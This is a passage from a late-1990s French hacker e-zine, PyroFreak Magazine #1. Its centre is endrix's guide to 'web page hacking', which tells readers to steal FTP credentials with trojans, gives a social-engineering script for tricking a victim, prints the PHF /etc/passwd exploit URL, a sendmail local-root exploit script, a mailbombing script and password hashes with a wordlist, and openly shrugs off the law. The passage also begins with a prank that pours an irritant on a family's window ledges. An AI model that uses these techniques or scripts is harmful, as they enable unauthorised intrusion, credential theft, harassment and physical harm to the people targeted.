ou le vent est en votre faveur. Bien entendu cela doit etre fait durant 
l't ou autre moment que les fenetres sont ouvertes. Pour une plus grande
efficaciter, verser le produit sur le rebord de toutes les fenetres ouvertes.
La famille va sortir de la maison en courrant.

ATTENTION: Ce produit,si exposer longtemps aux yeux, peu provoquer des 
irratations  de facon importante, soyez toujours prudent.

Pour conclure: La y 5h30 du matin, j'ai un cours "d'ducation physique"
dans 1h30, pis chu ben saoul et cela sans avoir dormi de la nuit. Bizzare
c'est quand je suis saoul que j'ai des ides pour mes articles.


La y rendu 10h am de la meme journer, pis je me suis fais crisser dehors de
mon cours pour l'anner, spa grave c'tais poche.

Le texte que vous venez de lire, est une version corriger de l'original, si
je l'aurais pas fait, vous auriez rien compris. Amuser vous bien.


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:
|        Un numero a essayer au Quebec sans vraiment une utilite
|                                320-0048
|
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __

- --- - 
      +:par endrix:+            		                
      - -Ĵ - -Ĵ
            __        __   _     ____                           
            \ \      / /__| |__ |  _ \ __ _  __ _  ___         
             \ \ /\ / / _ \ '_ \| |_) / _` |/ _` |/ _ \        
              \ V  V /  __/ |_) |  __/ (_| | (_| |  __/        
               \_/\_/ \___|_.__/|_|   \__,_|\__, |\___|        
                                            |___/              
                 _   _            _    _                       
                | | | | __ _  ___| | _(_)_ __   __ _           
                | |_| |/ _` |/ __| |/ / | '_ \ / _` |          
                |  _  | (_| | (__|   <| | | | | (_| |          
                |_| |_|\__,_|\___|_|\_\_|_| |_|\__, |          
                                               |___/           
                                                               
                						
      - ----
     

  __________________________________________________________________
 / _____________________________________<-www.endrix.net->__________\
 ||Site Web : Http://endrix.cjb.net ||_______________________\
 ||Contact : lordendrix@hotmail.com ||______________________________|| 
 ||mIRC : #pirate, #grc, #hack.fr, #phreak.fr, #outaouais, #n0past  ||
 \  /
  

     ============================================================
     =========================par endrix=========================
     ============================================================
     ==                                                        ==
     ==                                                        ==
     ==               The ultime guide to simple               ==
     ==                    web page hacking                    ==
     ==                                                        ==
     ==  Greeds to :                                           ==
     ==                                             ==
     ==      _________       __________       __________       ==
     ==    -[ _Franck ]- + -[ silicone ]- + -[  ASHMEU  ]-     ==
     ==    -[ _SnoOp_ ]- + -[ B|aster  ]- + -[  B3rT|9  ]-     ==
     ==    -[ B3rT|9  ]- + -[    H     ]- + -[ surge-16 ]-     ==
     ==                           ==
     ==                                                        ==
     ============================================================
     ============================================================
     ============================================================


  
                           O==============O 
                          <| Introduction |>
                           O==============O

       
 Hey bien, voici a une dition par moi, endrix, sur le web page hacking. 
Aprs avoir lu ce texte, vous devriez tre capable de modifier une page 
selon vous le dsirez mais certaines conditions s'appliquent. Je n'ai 
pas crit ca pour que tout le monde commence a hacker tout le monde. 
C'est juste pour vous montrez que vous pouvez faire que chose cool avec
peu de connaissance dans le piratage car ceci va vous permettre un hacker
une page web avec presque pas de commaissance. Pour me rejoindre, vous 
pouvez m'envoyer un email  lordendrix@hotmail.com ou sur mIRC, sur les 
channels suivants : #outaouais, #warezfrancais, #hack.fr, #haqch, #grc,
#pirate et #visualbasic. Je vous conseille fortement d'aller visiter mon 
site web  l'addresse suivante : Http://endrix.cjb.net. Si vous possdez 
un domaine(.com, .net ou .org) et le serveur est sur un T1 minimum et vous
voullez me hoster, hey bien contacter moi le plus vite possible !!!

Have fun !!!


       

                         O=================O 
                        <| Matire de base |>
                         O=================O



 Premirement, il faut savoir quelque matire de base avant faire tout ca.
"je veux hacker mais je ne sais pas comment utiliser un ftp" --> ichhhh !!
Je recois souvent un message de ce genre. Ici, je vais vous apprendre comment
utiliser un ftp, mais si vous tez un internet wizzard, skipper cette section
au plus sacran !!! Bon, pour mettre un site sur l'internet, il faut un serveur
qui est connect 24h sur 24h sur l'internet et qui offre un service de web 
hosting comme : 

- Geocities   => Http://www.geocities.com
- Multimania  => Http://www.multimania.com
- Fortunecity => Http://www.fortunecity.com
- ml services => Http://www.ml.org
- Xoom.com    => Http://www.xoom.com
- Angelfire   => Http://www.angelfire.com
- Altern      => Http://www.altern.org
- come        => Http://www.come.to
- et bien d'autres....

Ces serveurs offres un service de web hosting gratuit qui permet et personne
comme vous et moi de ce faire un super site web et attirer plein de gens du 
monde entier !! Aprs que votre page web est fait(index.html) il faut 
l'uploader(*) sur le serveur.

* = Uploader c'est envoyez un fichier de votre ordinateur.
    downloader c'est aller chercher un fichier d'un ordinateur au votre.

il y a 2 moyens de faire ca : WWW upload(d'un site web) et FTP. 
C'est pas tout les serveurs qui offrent le www upload mais un comme geocities
l'offre. Je vous conseille malgr cela, de toujours le faire par FTP. il y a 
plusieurs ftp sur le march du web mais je vous suggre d'utiliser le plus
connu : CuteFTP. Il est facile a utiliser et trs complet. Allez le cherchez
 http://www.tucows.com et pour l'enregistrer, emailer moi... Donc, une fois
install cuteftp, connectez-vous a votre serveur. Si vous tes a xoom, dans 
le host marquez : ftp.xoom.com, votre nom d'usager et le mot de passe. 
Une fois connect, vous pouvez envoyer tout vos fichiers sur le net sans 
difficult. 

Maintenant, vous savez comment utiliser un FTP. Pour hacker un site web, il 
vous faut le nom de l'host, le nom de l'utilisateur et le mot de passe. Le seul
qui est dur a obtenir est le mot de passe(password). Pour avoir le host,
si la page est www.xoom.com/z3r0c00l/index.html, le host est xoom.com et le
username est z3r0c00l mais comment le host si c'est... worldhacking.com ??!?!
Pour faire ca, il vous faut ouvrir votre mode ms-dos.
Dmarrer, Excuter et crire "command" et clicker sur "Enter". Une fentre va 
apparaitre(MS-DOS) : 

------
Microsoft(R) Windows 98
   (C)Copyright Microsoft Corp 1981-1998.

C:\WIN98\Bureau>
------

Il faut tre dans le c:\win98>. Alors tapez c:\win98\bureau>cd..

------
c:\win98>
------

La, il fait ouvrir un programme qui l'appelle Telnet. Ce programme est utilisez
pour faire plusieur choses.. chatter, vrifiez ces emails, uploader sont site web,
.... Faites ca : 

------
c:\win98>telnet whois.internic.net 23
------           

ceci va ouvrir le programme Telnet et va marquer ca(c'est normal que parfois
ca prenne quelque temps..) :

------
UNIX(r) System V Release 4.0 (rrs4)

***************************************************************************
* -- InterNIC Registration Services Center  --
*
* For the *original* whois type:     WHOIS [search string] <return>
* For referral whois type:           RWHOIS [search string] <return>
*
* For user assistance call (703) 742-4777
# Questions/Updates on the whois database to HOSTMASTER@internic.net
* Please report system problems to ACTION@internic.net
***************************************************************************
The InterNIC Registration Services database contains ONLY
non-military and non-US Government Domains and contacts.  
Other associated whois servers:
       American Registry for Internet Numbers - whois.arin.net
       European IP Address Allocations        - whois.ripe.net
       Asia Pacific IP Address Allocations    - whois.apnic.net
       US Military                            - whois.nic.mil
       US Government                          - whois.nic.gov
Cmdinter Ver 1.3 Mon Jan 18 23:22:59 1999 EST
[dec-vt100] InterNIC >
-------


what tha  ???? La, vous tes conenct a un serveur whois.internic.net qui vous
permets d'obtenir de l'information sur n'importe koi .. faites ceci :

-----
[dec-vt100] InterNIC >whois worldhacking.com
-----

et ca va donner quelque chose comme ca : 


-----
Registrant:
alexmax gaublay (WORLDHACKING-DOM)
   154 rue des champselyses
   chicoutimi, NA g7h3g3
   CA

   Domain Name: WORLDHACKING.COM
   Domain Status: On Hold

   Administrative Contact:
      albert, fredo  (FA1544)  pennyboy@MYGALE.ORG
      545-2426 (FAX) 645-3532
   Technical Contact, Zone Contact:
      Lacambre, Valentin  (VL15)  root@ALTERN.COM
      33 1 40264666
   Billing Contact:
      albert, fredo  (FA1544)  pennyboy@MYGALE.ORG
      545-2426 (FAX) 645-3532

   Record last updated on 12-Jan-99.
   Record created on 21-Oct-98.
   Database last updated on 16-Jan-99 04:09:41 EST.

   Domain servers in listed order:

   NS1.MERDRE.NET               209.66.99.99
   NS2.MERDRE.NET               209.207.174.20

Whois: 
-----

d'aprs ce qu'a donn ca, le domain worldhacking.com est host par le serveur 
MERDRE.NET, merdre.net est un domaine de altern.org. Donc, voila qu'on connait
le host de worldhacking.com qui est ftp.altern.org !!! et le username qui est 
worldhacking bien sur !!! Mais maintenant, comment trouver le password ???
heehe le fameux fichier que tout le monde aimerais avoir !!! Et bien, j'ai trouv
plusieurs moyen de se procurer ce fichier :

- par un trojan
- S.E.
- www password cracker
- PHF
- Changement d'email 
- Partage de fichier
- Exploit de linux par un trou de scurit




======================
=  Les fichiers PWL  =
======================


Quand vous allez cracker des fichiers mot de passe, il vous faut les connaitre. Un fichier 
mot de passe est normalement comme ceci :

Administrator:500:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904

Ceci est un fichier password d'un administrateur de domaine. Tout les chiffres que vous voyez,
sont le password encrypt. Pour le dcrypter, il faut un programme. Le meilleur que je connaisse
est John the Ripper et/ou LOphtCrack. Ces programmes sont ultra rapide pour faire ce genre de 
chose pour cracker, il faut un password et une word list... Une word list a l'air de quelque chose
comme ca :

0
1
7
123
246
249
369
777
911
1022
1225
1234
1313
1928
1951
2112
2222
4444
5252
5555
5683
6969
7007
7777
12345
13579
14430
54321
80486
90210
92072
111111
121212
123123
123456
131313
654321
666666
696969
888888
1234567
8675309
12345678
21122112
99999999
!@#$%
!@#$%^
!@#$%^&
!@#$%^&*
*
@#$%^&
_
10sne1
1234qwer
123abc
123go
1701d
1a2b3c
1p2o3i
1q2w3e
1qw23e
1sanjose
2welcome
4runner
a
A&M
A&P
a12345
a1b2c3
a1b2c3d4
AAA
aaa
aaaaaa
Aaaaaa
AAAS
aardvark
Aarhus
Aaron
aaron
AAU
ABA
Ababa
aback
abacus
abalone
abandon
abase
abash
abate
abater
abbas
abbe
abbey
abbot
Abbott
abbreviate
abby
abc
abc
abc123
ABC123
abcd
abcd1234
abcde
Abcdef
abcdef
Abcdefg
abcdefg
abdicate
abdomen
abdominal
abduct
Abe
abed
Abel
Abelian
Abelson
Aberdeen
Abernathy
aberrant
aberrate
abet
abetted
abetting
abeyance
abeyant
abhor
abhorred
abhorrent
abide
Abidjan
Abigail
abigail
abject
abjure
ablate
ablaze
able
ablution
abnegation
Abner
abnormal
Abo
aboard
abode
abolish
abolition
abominable
abominate
aboriginal
aborigine
aborning
abort
abound
about
above
aboveboard
aboveground
abovementioned
abrade
Abraham
Abram
Abramson
abrasion
abrasive
abreact
abreast
abridge
abridgment
abroad
abrogate
abrupt
abscess
abscissa
abscissae
abscond
absence
absent
absentee
absenteeism
absentia
absentminded
absinthe
absolut
absolute
absolution
absolve
absorb
absorbent
absorption
absorptive
abstain
abstention
abstinent
abstract
abstracter
abstractor
abstruse
absurd
absurdum
abuilding
abundant
abusable
abuse
abusive
abut
abutted
abutting
abysmal
abyss
Abyssinia
AC
acacia
academe
academia
academic
academician
academy
Acadia
acanthus
Acapulco
accede
accelerate
accelerometer
accent
accentual

Voici une minuscule word list. Essayez de cracker celui-ci. Vous devriez trouver le password
"A" pour l'administrateur. En voici d'autre pour vous : 

foura:1002:DCF9CAA6DBC2F2DFAAD3B435B51404EE:FA5664875FFADF0AF61ABF9B097FA46F:::
fivea:1003:A80F6E6A87BA6AC2AAD3B435B51404EE:75C06256F58D07A18B239E4CC39A382D:::
sixa:1004:A9C604D244C4E99DAAD3B435B51404EE:ACB98FD0478427CD18949050C5E87B47:::
sevena:1005:CBC501A4D2227783AAD3B435B51404EE:20C3AE5D1C643871B2CA618C2512CC46:::
eighta:1006:CBC501A4D22277837584248B8D2C9F9E:291E34A0D1EEB75F9ECB0880B469BE23:::
onez:1007:1D91A081D4B37861AAD3B435B51404EE:0366F5C43990657D4AF37BC470E0EF97:::
twoz:1008:E1C862B468D1C6D6AAD3B435B51404EE:A2EBDCC6F325AB2B343020497301F66C:::
threez:1009:CF78D4607D48813AAAD3B435B51404EE:CC12D60632E2BEBE925F20970B6C1EE8:::
fourz:1010:CE045FF77F9D89E2AAD3B435B51404EE:5029F63209F0A33B7BAACF85F1984DB3:::
fivez:1011:9A0A242740E1E245AAD3B435B51404EE:974EEB9F2ED704D87E8EB392EEA688ED:::
sixz:1012:1FB363FEB834C12DAAD3B435B51404EE:FCE5DF542D589B2B55E2A8EA8290C8B6:::
sevenz:1013:A5E6066DE61C3E35AAD3B435B51404EE:BFA802E2F36CDF2B776B7A85FD5ED863:::
eightz:1014:A5E6066DE61C3E351D91A081D4B37861:F05C1449BA2575D9764EC7F9DE4F8040:::
ninez:1015:A5E6066DE61C3E35E1C862B468D1C6D6:F08E2A5987D4692D9A8B32CF409DB874:::
onem:1016:1486235A2333E4D2AAD3B435B51404EE:7E864D8195B263B4D6AEE4E041C0193F:::
twom:1017:FBF69FCD34281A77AAD3B435B51404EE:094930B371F21E4A8379CC6ACF23B05E:::
threem:1018:8F3E3862EBBCCC49AAD3B435B51404EE:C1E809475B2D41C4EA883A249EE4D203:::
fourm:1019:4983AA449F48595CAAD3B435B51404EE:313FCB69CF31E3EDA1CA2C94B79B33A2:::
fivem:1020:D5C546473739D83AAAD3B435B51404EE:A918E0700CE78341A188774DD66DC7A4:::
sixm:1021:81A28589262A0004AAD3B435B51404EE:FF4EF4C1DD99FFC59D982E40522FF474:::
sevenm:1022:F6F2FA9986D540CFAAD3B435B51404EE:9FACF535A07FC4B778D9879B49EA004D:::
eightm:1023:F6F2FA9986D540CF1486235A2333E4D2:60B0D2BA29482C9AE3E07A4617176E51:::
ninem:1024:F6F2FA9986D540CFFBF69FCD34281A77:8B64AA9FDDE6B8C7F246E20845797545:::

Essayez de les crackers .... Pour les passwords, emailer moi et je vais vous dire 
si c'est correct ou pas.



===================
=  Par un Trojan  =
===================

Pour faire ca, il vous faut, un IPscanner et un client de trojan, les suivants feront 
l'affaire : 

- Socket de Troie
- NetBUS
- DeepBO
- Hacker's paradise
- Portal of Doom
- Millenium
- N'importe quel trojan qui donne un access au disque dur.

PortScanner : Ce programme va servir  scanner un IP(xxx.xxx.xxx.1  xxx.xxx.xxx.255)
              et trouver des personnes qui sont infect par un trojan.
              Port : - 5000 (socket de troie)
                     - 31337 (BackOrifice)
                     - 31338 (DeepBO)
                     - 12345 (Netbus v1.6)
                     - 123456 (netbus v1.7)

Avec des trojans, il y a deux maniere que j'ai trouv. Avec un trojan et permet de voir
les cached passwords(DeepBO) ou avec un qui donne accss au HD(Disque dur). DeepBO est un
trojan, qui quand tu es connect, il permet de te montrer les passwords que la personne
a dans sont registery(base de registre). il y a des serveurs comme geocities qui envoit 
un cookie dans ton reg ou certains FTP font ca aussi... Et quand, avec deepbo, tu vas avoir 
trouv une personne qui est infect et a une page web avec geocities... quand tu vas faire 
voir les cached passwords, ca va te donner les passwords et les usernames ... tu peux aussi
infect le web master d'un site web si tu veux en fesant du se .... Avec netbus ?!? Et bien, 
cette maniere va marcher avec n'importe quel trojan qui permet d'avoir access au HD de 
l'utilisateur du PC. Si la personne a CuteFTP, dans sont rpertoire, il y a un fichier qui
se nomme smdata.dat Ce fichier contient les informations des ftp que la personne a mit dans 
sont bookmark. Tu peux voir le user name, le host mais le password est encrypt. Voici la 
cl de dcryption pour CuteFTP : 


a =        b =        c =        d =         e =        f = 
g =        h =         i =        j =         k =        l = 
m =        n =        o =        p =         q =        r = 
s =        t =        u =       v =         w =        x = 
y =        z =  


ou bien, vous avez juste a tlcharger le fichier smdata.dat et le remplacer par celui que
vous avez en ce moment dans cotre CuteFTP a vous. Maintenant, vous avez juste a ouvrir votre
cuteftp et vous connect au ftp du mec et modifier ca page web a votre guise ...

     

=======================
= Social Eingineering =
=======================


Le Social Eingineering est une facon de convaincre la personne, le web master, le mec qui 
travaille la.... de vous faire confiance et de vous donnez des informations trs importante
qui vons vous permettre d'accomplir votre but avec succs !! Si vous voullez le fichier
smdata.dat vous avez juste a faire un petit scnario comme celui-ci :

<vous> Hey man ca va ???
<victime> ouaip pi toi ?
<vous> pas mal merci ......
<vous> euhhmm.. j'ai grandement besoin d'aide ...
<vous> as-tu CuteFTP ???
<victime> oui pourquoi ????
<vous> il faut que j'update mon site au plustot mais ma soeur ou mon pere ont du touch a
l'ordinateur, car quand j'ouvre mon cuteftp ca marque qu'il manque un fichier .. meneute
m'a aller voir c'est koi encore ....
<victime> ok ...
<vous> c'est le fichier "smdata.dat" .... 
<vous> tu dois l'avoir ????
<victime> euuuuuuu... oui je crois ... si oui, je vais te l'envoyez ...
DCC send = smdata.dat
<vous> si tu tais a ct de moi, je te donnerait un gros bec !!!
<vous> merci, merci beaucoup !!!
<victime> np
<vous> tiens, t'ira voir mon travail dans 20 minutes  : http://www.domaine.com
<vous> merci encore, je dois y aller !!
<victime> ok bye !!

heehe ceci est une technique de SE. Vous aussi enfaire un pour envoyer un virus a un
mec et faire accroire que c'est un super programme .... Je vous laisse avec votre imagination
sur ce point ...


========================
= www password cracker =
========================


un WWW password cracker, est un programme, qui avec une bonne word list(*), trouve le mot de
passe. 

* word list : Une word list, est un fichier texte qui contient que des mots ....

Ce que le programme fait : Il se connecte sur le FTP du mec, avec le username et le host et
essaye de ce connecter avec chaque mot qu'il y a dans le word list comme password. Je sais,
ca peut tre trs long car, il y a des word lists, et contiennent comme 10000 mots... mais
il s'agit de trouv une bonne word list et ca risque de marcher a tout coup !!! Voici quelque
programme qui font ca :

- Unsecure
- WebCrack
- WWWHack (pour les pass en HTML)
- Nessus
- VcrackFTP



====================
= Technique du PHF =
====================

Bien cette technique, a t il y a trs longtemp dcouvert mais il y a encore 5% des serveurs
qui n'on pas changer leurs programmes et qui sont vulnrable. Cette maniere, est une des plus
faciles qu'il y a !!! Encore plus facile qu'avec les trojans. Pour obtenir le fichier password,
il s'agit de faire ca :

Http://www.domaine.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

et voila !! c'est tout !!! Vous n'avez qu'a remplacer le domaine.com par le site que 
vous voullez hack. 



======================
= Changement d'email =
======================


Dans tout les serveurs qui offrent du web hosting gratuit, pour vous inscrire, vous devez
entrer vos coordones, le nom d'utilisateur et le mot de passe. Pour activer votre compte,
il faut aller voir vos emails et avec votre password, activ le compte. Donc, pour commencer
il vous faut avoir un email qui est presque pareille que le web master du site. Aprs, allez
sur le site de votre web hosting, aller dans aide et faitez un changement d'adresse email. 
Quand ceci va tre fais, demander pour vous envoyez le mot de passe a votre nouveau car, vous
l'avez perdu et, blah, blah, blah ... Quand vous allez checker vos emails, vous allez voir
un message du servuer vous donnant le mot de passe du site ! :))))



======================
= Partage de fichier =
======================


Hey bien, quand vous allez chez vos amis(es) avec votre ordinateur, et vous vous mettez en 
rseaux, vous jouez a des jeux comme, Starcraft, Quake, Doom, Duke 3D, Blood.... Mais aprs
quand vous avez finnit, vous allez mettre le HD de votre ami en partage de fichier(qui te 
donne accss au HD de ton chu) et tu vas chercher des fichiers cool, des jeux, ou meme des 
logs de mIRC ... Aprs avoir fait tout ca, vous partez, mais doooooohh !!! Tu as oublier
de copier des fichiers...GRRRrrrrrrr !!!! Tu peux pas lui demander parce que tu n'es pas 
suppos avec ces fichiers... alors quand il va tre sur le Net, tu vas le voir tu dit
salut, blah, blah ... Tu prends sont IP(/dns nick). Premirement, il faut vrifier s'il
l'a aut.. comment !!!!???? Ouvrez une fentre dos(Dmarrer, Execut tappez command et 
peser sur enter).


--------
Microsoft(R) Windows 98
   (C)Copyright Microsoft Corp 1981-1998.

C:\WIN98\Bureau>
--------

bon, allez dans votre rpertoire de windows, c:\win98\bureau>cd..
c:\win98>

La, on va utiliser une commande qui permet de voir si la personne est encore en partage
de fichier...


--------
c:\win98>nbtstat -A IP

     NetBIOS Remote Machine Name Table

    Name               Type               Status
-----------------------------------------------------
UNSERNAME           <00> UNIQUE         Registered
WORKGROUP           <00> GROUP          Registered
USERNAME            <03> UNIQUE         Registered
USERNAME            <20> UNIQUE         Registered
WORKGROUP           <1E> GROUP          Registered
MAC Address = 44-45-53-54-00-00

c:\win98>
--------

Si vous voyez ca, ca veux dire que ton ami est encore en partage de fichier. 
Avant de l'appeller pour lui dire, il faut que tu ailles chercher tes fichiers.... 
S'il n'est pas en partage de fichier, vous verez un message d'erreur. Dans le fond, 
ce qui nous interresse, c'est le <20>, qui est le service de partage. S'il n'est 
pas la, vous ne pourrez jamais, au grand jamais, vous connecter  cet ordinateur. 
La, il faut que vous tappiez la commande suivante :

--------
c:\win98>echo IP_du_remote_20 > c:\win98\lmhosts
--------

Ceci va cre le fichier lmhosts avec tout les choses dedant pour faire fonctionner 
le hack. Si le lmhosts n'est pas la, ou est mal crit, rien de vais marcher. Et 
voila, il ne vous reste qu' rester le cache du netbios en tappant la command suivante :


-------
c:\win98>nbtstat -R

Successful purge and preload of the NBT Remote Cache Name Table.
c:\win98>
-------

Maintenant, pour voir les drives qui sont en partage, vous pouvez faire ceci :

-------
c:\win98>net view \\nom_remote_20
Shared resources at \\USERNAME

Sharename         Type          Comment
-----------------------------------------------
A                 Disk
C                 Disk
D                 Disk
The command was completed successfully

c:\win98>
-------

Bon, apres avoir fait ca, vous pouvez voir quel drives vous avez accss. D'apres celui-ci, 
le A, le C, le D sont en partage donc, vour pouvez avoir accss au A, C et D. Pour vous 
connecter, faites ceci : 

-------
c:\win98>net use * \nom_du_remote_20 le_drive
-------

Donc, si le nom_du_remote_20 est : endrix
et le drive est : c
Faites :

c:\win98>net use * \endrix c

Et bien la, vous tes connect sur l'ordinateur du mec. Maintenant vous pouvez 
allez chercher vos fichiers et l'appeller pour lui dire de ne plus laissez sont 
HD en partage.


=====================
= Exploit de Linux  =
=====================


Hey bien pour cette section je ne vais que montrer un exploit trs cunnu 
qui a comme fonction de faire un bug dans le systme et vous donnez le r00t 
du Pc. Cet exploit de nomme : 
SendMail v8.8.4
il cre un programme dans le /tmp/x qui donne le root apres ...

SendMail :

cat <<_EOF_>/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
 execl(RUN,RUN,NULL);
}
_EOF_
#
cat <<_EOF_>/tmp/spawnfish.c
 main()
 {
  execl("/usr/lib/sendmail","/tmp/smtpd",0);
 }
_EOF_
#
cat <<_EOF_>/tmp/smtpd.c
 main()
 {
 setuid(0);setgid(0);
 system("shown root /tmp/x ;chmod 4755 /tmp/x");
 }
_EOF_
#
#
gcc -O3 -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c 
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP '/usr/ucb/ps -ax|grep /tmp/smpd|grep -v grep|sed s/"[]*"//cut -d" "-fl' 
 rm /tmp/spawnfish.c /tmp/spawnfish /tmpsmtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
   echo "leet..."
   /tmp/x
fi


En voici un autre : 

#!/bin/bash
TMPDIR=/tmp/`whoami`
PLIK=$TMPDIR/.safe
TIMEOUT=2
LIMIT=10
MAX=20

echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
echo

if [ "$4" = "" ]; then
   echo "USAGE: $0 msgfile address server sender"
   echo
   echo "  msgfile - file to send as a message body"
   echo "  address - address of lucky recipient"
   echo "  server  - outgoing smtp server w/sendmail"
   echo "  sender  - introduce yourself"
   echo
   echo "WARNING: For educational use ONLY. Mailbombing is illegal."
   echo "Think twice BEFORE you use this program in any way. Also,"
   echo "I've never said this program is 100% safe nor bug-free."
   echo
   sleep 1
   exit 0
fi

if [ ! -f $1 ]; then
   echo "Message file not found."
   echo
   exit 0
fi

echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
bb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
safebomb__safebomb__safebomb_\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=0

while [ -f $1 ]; do
$PLIK|telnet $3 25 &>/dev/null &
let SENT=SENT+1
echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
CONNECTED=`ps|grep -c "telnet $3"`
if [ "$LIMIT" -le "$CONNECTED" ]; then
   while [ "$LIMIT" -le "$CONNECTED" ]; do
   sleep 1
   done
fi
if [ "$SENT" -ge "$MAX" ]; then
   echo "It's just an example, sorry."
   echo
   exit 0
fi
done




hey bien, je vous souhaite ben du fun les boys and girls avec 
ces exploits !!!


                               O============O 
                              <| conclusion |>
                               O============O

            voila, c'est finnit !!!! Avec ca, vous allez 
            pouvoir vous faire ben du fun... N'oublier que
            d'entrer sur un ordinateur qui n'est pas le notre
            est un infraction a la loi(who gives a fuck...).
            Faites vous pas pogner et si vous avez d'autre
            maniere que je n'ai pas penss, faites moi le
            savoir !!!
 



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:        #Quebec can't join channel (it's full) , un classique quoi.
|            Plus maintenant grace a /timer 0 3 /join #quebec
|                  Une fois entrer sur le chan,tapper
|                                /timer1 off
|                   Pour ceux qui avaient pas pens a ce truc
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __
Qui sont-ils ?
Par [G]r4FX
 
Pirates. 

Le terme de pirate englobe toutes les personnes qui enfreignent les lois de
l'informatique. Ces lois sont tablies par chaque pays, cela pose un problme 
car Internet est accessible  tous les habitants de la plante et certains 
actes sont des infractions pour les uns mais pas obligatoirement pour les 
autres. (Informatique et Libert).  Le pirate est une personne qui viole les 
droits d'autrui ou des socits  son profit. Les pirates les plus communs 
sont les hackers, les crackers et toute personne copiant du software pour son 
utilisation personnelle ou pour la vente.  Nous laisserons de ct la copie 
de software, pour nous intresser de plus prs  ceux qui veulent prendre le 
contrle d'un systme informatique alors qu'ils n'y sont pas autoriss. 



Hackers.

Le hacker est une personne qui rentre dans un systme informatique en sautant 
les barrires de protection (Le roi des hackers), souvent par dfi 
intellectuel et pas toujours par profit matriel. Certains ne font que 
visiter le systme causant, malgr tout, la panique des services de scurit. 
D'autres hackers appels parfois crackers sont beaucoup plus actifs; ils 
pntrent un systme et en dtriorent le software en le modifiant, en le 
dtruisant, en lui implantant un virus, etc.  Un exemple simple de " cracking 
" pourrait tre celui de changer un lien (" link ") par une autre sans en 
changer le nom.  C'est  dire une personne qui voudrait rentrer pour 
connatre les offres d'une banque serait renvoye sur un autre site. 


 
Les hackers sont-ils dangereux? 

Outre le fait qu'une attaque de hackers peut endommager ou dtruire votre 
software, hackers ou crackers peuvent aussi violer l'intimit de n'importe 
quel citoyen. Beaucoup de personnes ont dans leur ordinateur ou dans celui de 
leur entreprise une grande partie de leur vie personnelle : accs aux comptes 
en banque, courrier lectronique qu'il soit personnel ou professionnel, 
etc...Une attaque de hackers peut donc se traduire par une destruction de ces 
donnes ou pire par une utilisation frauduleuse et  votre insu de celles-ci. 



Comment procdent-ils? 

Certains pirates russissent  rentrer dans un rseau en utilisant un code 
d'entre ( mot de passe ). Ils essaient, d'abord, de se renseigner sur le 
nombre de caractres possibles dans le code. Ensuite, ils tentent, par 
l'intermdiaire d'un programme de leur fabrication, tous les codes possibles 
par rapport au nombre de caractres obtenus auparavant et ce  jusqu'au 
succs.  Une autre mthode est la suivante: les pirates recherchent des 
informations personnelles sur le propritaire du systme qu'ils veulent 
visiter. Les statistiques dmontrent que la plupart des personnes prennent 
leurs donnes personnelles comme code d'entre dans leur ordinateur. (nom de 
leurs enfants, date de naissance, etc...). Alors, les hackers essayent 
diffrentes combinaisons avec ces donnes.  Il n'est bien entendu pas 
possible de recenser toutes les mthodes, l'imagination des hackers est sans 
bornes. 




Exemples

De la Une du New York Times aux journaux tlviss diffuses aux heures de 
grande coute, tous les mdias ont retenu du 3 novembre 1988 l'arrive d'un 
virus qui a paralys pendant plusieurs jours la quasi totalit des centres de 
calcul universitaires et de recherche des Etats-Unis.  L'auteur Robert Tappan 
Morris a t condamn par le tribunal de Syracuse USA  400 heures de " 
service communautaire ",  trois ans de surveillance judiciaire et  10 000 
dollars d'amende.   C'est la diffusion fulgurante du virus qui constitue la 
caractristique la plus tonnante de l'action du " ver " de Robert T.  
Morris. Les premiers signes de l'pidmie sont apparus presque simultanment 
sur les ctes Est et Ouest. A une demi-heure d'intervalle, le Massachusetts 
Institute of Technology ( MIT ) et la Rand Corporation se trouvaient 
